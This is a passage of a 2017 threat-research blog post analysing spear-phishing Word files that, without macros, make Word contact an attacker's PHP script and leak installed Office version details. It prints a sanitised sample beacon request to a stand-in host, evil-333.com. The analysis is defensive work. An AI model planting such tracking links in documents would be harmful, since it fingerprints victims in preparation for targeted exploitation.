An (un)documented Word feature abused by attackers
securelist.com /an-undocumented-word-feature-abused-by-attackers/81899
By Alexander Liskin, Anton Ivanov, Andrey Kryukov on September 18, 2017. 9:00 am
A little while back we were investigating the malicious activities of the Freakyshelly targeted
attack and came across spear phishing emails that had some interesting documents attached to
them. They were in OLE2 format and contained no macros, exploits or any other active content.
However, a close inspection revealed that they contained several links to PHP scripts located on
third-party web resources. When we attempted to open these files in Microsoft Word, we found
that the application addressed one of the links. As a result, the attackers received information
about the software installed on the computer.
What did the bad guys want with that information? Well, to ensure a targeted attack is successful,
intelligence first needs to be gathered, i.e. the bad guys need to find ways to reach prospective
victims and collect information about them. In particular, they need to know the operating system
version and the version of some applications on the victim computer, so they can send it the
appropriate exploit.
In this specific case, the document looked like this:
There’s nothing suspicious about it at first glance – just a few tips about how to use Google
search more effectively. The document contains no active content, no VBA macros, embedded
Flash objects or PE files. However, when the user opens the document, Word sends the following
GET request to one of the internal links. So we opened the original document used in the attack,
replaced the suspicious links with http://evil-*, and obtained the following:
GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR
2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C;
InfoPath.2; MSOffice 12 )
https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/ 1/4
8/16/2019 An (un)documented Word feature abused by attackers | Securelist
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive
This code effectively sent information about the software installed on the victim machine to the
attackers, including info about which version of Microsoft Office was installed. We decided to
examine why Office followed that link, and how these links can be identified in documents.